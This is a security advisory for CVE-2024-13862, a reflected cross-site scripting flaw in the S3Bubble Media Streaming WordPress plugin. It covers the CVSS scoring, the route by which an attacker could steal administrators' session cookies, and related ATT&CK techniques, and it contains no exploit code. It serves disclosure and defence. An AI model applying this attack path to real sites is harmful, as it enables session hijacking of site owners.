CVE-2024-13862
Published: 11 March 2025
Description
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Security Summary
CVE-2024-13862 is a reflected cross-site scripting (XSS) vulnerability, classified under CWE-79, in the S3Bubble Media Streaming (AWS|Elementor|YouTube|Vimeo Functionality) WordPress plugin through version 8.0. The flaw arises because the plugin does not sanitize and escape a parameter before outputting it back in the page, enabling script injection. It carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L), indicating high severity due to network accessibility, low attack complexity, no required privileges, user interaction, and changed scope.
An unauthenticated attacker (PR:N) can exploit this remotely (AV:N) by crafting a malicious link or page that requires victim interaction (UI:R), such as clicking or viewing content. The reflected nature targets high-privilege users like administrators, allowing arbitrary script execution in their browser context. This could result in low-level impacts on confidentiality, integrity, and availability, such as stealing session cookies, performing unauthorized actions, or defacing pages on behalf of the victim.
Mitigation details are available in the WPScan advisories at https://wpscan.com/vulnerability/7692b768-a33f-45a2-90f1-1f4258493979/. The vulnerability was published on 2025-03-11.
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Reflected XSS enables malicious link delivery (T1204.001) for arbitrary browser script execution, directly facilitating browser session hijacking (T1185) and web session cookie theft (T1539) as explicitly described in the CVE impacts.